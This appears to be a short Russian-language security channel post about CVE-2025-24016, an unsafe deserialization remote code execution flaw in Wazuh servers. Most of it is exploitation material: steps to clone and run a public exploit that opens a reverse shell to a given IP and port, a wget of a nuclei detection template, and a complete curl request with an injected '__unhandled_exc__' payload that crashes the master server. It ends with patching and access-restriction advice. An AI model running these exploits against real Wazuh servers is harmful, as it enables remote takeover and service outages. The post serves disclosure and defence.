6 подписчиков
Wazuh RCE via Unsafe Deserialization CVE-2025-24016
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров DistributedAPI в формате JSON и последующей десериализации через функцию as_wazuh_object (расположенную в framework/wazuh/core/cluster/common.py). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере.
➡️Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
python3 -m venv venv; source venv/bin/activate
pip install -r requirements.txt
Скрипт позволяет сразу сделать reverse shell python3 CVE-2025-24016.py -u <url> -i <IP> -p <PORT>
PoC 2. Шаблон для nuclei
wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://<worker-server>:55000/security/user/authenticate/run_as
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️Рекомендации
▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️Ограничение доступа: Проверьте и ограничьте доступ к API.
1 минута
18 февраля 2025